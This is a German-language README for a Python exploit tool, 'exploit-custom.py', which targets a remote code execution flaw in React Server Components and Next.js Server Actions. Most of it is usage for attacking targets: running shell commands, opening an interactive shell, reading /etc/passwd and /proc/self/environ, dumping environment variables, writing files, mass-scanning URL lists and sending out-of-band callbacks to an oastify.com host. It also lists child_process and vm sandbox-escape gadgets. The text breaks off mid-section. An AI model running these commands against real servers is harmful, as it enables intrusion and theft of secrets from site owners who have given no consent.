CVE-2025-55182 - React Server Components RCE Exploit v2.0
Ein umfassendes Sicherheitsforschungstool zum Testen der Schwachstellen CVE-2025-55182 und CVE-2025-66478 in React Server Components (RSC) und Next.js Server Actions.
Schwachstellenübersicht
| Eigenschaft | Wert |
|---|
| CVE-IDs | CVE-2025-55182, CVE-2025-66478 |
| CVSS-Score | 10.0 (KRITISCH) |
| Betroffene Versionen | React < 19.2.0, Next.js < 15.0.5 |
| Schwachstellentyp | Remote Code Execution (RCE) |
| Angriffsvektor | Netzwerk |
Funktionen
- Schwachstellenscan im PortSwigger-Stil mit mehreren Erkennungs-Payloads
- Mehrere RCE-Gadgets (execSync, spawnSync, vm.runInThisContext, etc.)
- Out-of-Band (OOB)-Callback-Tests zur Verifizierung blinder RCE
- Datei-Lese-/Schreibfunktionen
- Ausführung von JavaScript-Code
- Interaktiver Shell-Modus
- Massenscanning mit Multithreading
- Proxy-Unterstützung (Burp Suite kompatibel)
- JSON-/Text-Ausgabeformate
Installation
Anforderungen
pip install requests
Python-Version
Schnellstart
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan
# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Interactive shell
python3 exploit-custom.py -u https://target.com --shell
Verwendung
Befehlszeilenargumente
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
Zielauswahl
| Argument | Beschreibung | Beispiel |
|---|
-u, --url | Einzelne Ziel-URL | -u https://target.com |
-l, --list | Datei mit URLs | -l targets.txt |
Scan-Modi
| Argument | Beschreibung |
|---|
--detect | Next.js/RSC-Verwendung erkennen |
--check | Schneller Schwachstellencheck (Mathetest) |
--scan | Vollständiger Schwachstellenscan (PortSwigger-Stil) |
--test-all | Alle Gadgets und Erkennungs-Payloads testen |
Ausnutzung
| Argument | Beschreibung | Beispiel |
|---|
--cmd | Shell-Befehl ausführen | --cmd "id" |
--gadget | Gadget zur Verwendung angeben | --gadget execSync |
--read | Datei vom Ziel lesen | --read /etc/passwd |
--write | Datei auf das Ziel schreiben | --write /tmp/test.txt "content" |
--js | JavaScript-Code ausführen | --js "process.env" |
--shell | Interaktive Shell starten | --shell |
--oob | OOB-Callback-Host | --oob xyz.oastify.com |
Verbindungsoptionen
| Argument | Beschreibung | Beispiel |
|---|
-p, --proxy | HTTP/HTTPS-Proxy | -p http://127.0.0.1:8080 |
-c, --cookies | Cookie-String | -c "session=abc123" |
-H, --header | Zusätzlicher Header (wiederholbar) | -H "X-Custom: value" |
-t, --threads | Anzahl der Threads für Massenscans | -t 20 |
--timeout | Anfrage-Timeout in Sekunden | --timeout 60 |
Ausgabeoptionen
| Argument | Beschreibung |
|---|
-o, --output | Ergebnisse in Datei speichern (.json oder .txt) |
-q, --quiet | Banner unterdrücken |
Scan-Beispiele
Einzelnes Ziel
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect
# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan
# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
Massenscanning
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json
# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
Beispiele zur Ausnutzung
Befehlsausführung
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
Dateioperationen
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
JavaScript-Ausführung
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
Interaktive Shell
python3 exploit-custom.py -u https://target.com --shell
Shell-Befehle:
| Befehl | Beschreibung |
|---|
<command> | Shell-Befehl ausführen |
!read <file> | Datei lesen |
!write <file> <content> | Datei schreiben |
!js <code> | JavaScript ausführen |
!gadget <name> | Gadget wechseln |
exit | Shell beenden |
Verfügbare Gadgets
RCE-Gadgets
| Name | Modul-ID | Beschreibung |
|---|
execSync | child_process#execSync | Direkte Ausführung von Shell-Befehlen |
execFileSync | child_process#execFileSync | Binärdatei ausführen |
spawnSync | child_process#spawnSync | Prozess mit Argumenten starten |
vm_runInThisContext | vm#runInThisContext | JS im aktuellen Kontext ausführen |
vm_runInNewContext | vm#runInNewContext | JS mit Sandbox-Escape ausführen |
vm_runInThisContext_global | vm#runInThisContext | Über global.process ausführen |
Datei-Gadgets
| Name | Modul-ID | Beschreibung |
|---|
fs_readFileSync | fs#readFileSync | Beliebige Dateien lesen |
fs_writeFileSync | fs#writeFileSync | Beliebige Dateien schreiben |
OOB-Gadgets
| Name | Beschreibung |
|---|
vm_fetch | HTTP-Anfrage über die Fetch-API (Node 18+) |
vm_http | HTTP-Anfrage über das http-Modul |
Erkennungs-Payloads (CVE-2025-66478)
Der Modus --scan verwendet diese Erkennungs-Payloads im PortSwigger-Stil:
| Payload | Beschreibung |
|---|
property_reference | Durch Doppelpunkte begrenzter Eigenschaftsverweis ["$1:a:a"] |
property_reference_v2 | Alternativer Verweis ["$1:b:b"] |
property_reference_constructor | Konstruktorzugriff über Eigenschaftsverweis |
property_reference_proto | Protokettenzugriff über Eigenschaftsverweis |
action_ref_vm | ACTION_REF mit vm#runInThisContext |
action_ref_execSync | ACTION_REF mit child_process#execSync |
OOB-Callback-Methoden
Das Tool unterstützt mehrere OOB-Callback-Methoden:
| Methode | Beschreibung |
|---|
curl | HTTP-Anfrage über den curl-Befehl |
wget | HTTP-Anfrage über den wget-Befehl |
nslookup | DNS-Abfrage |
ping | ICMP-Ping |
fetch | Node.js-Fetch-API |
http | Node.js-http-Modul |
Ausgabeinterpretation
Terminalfarben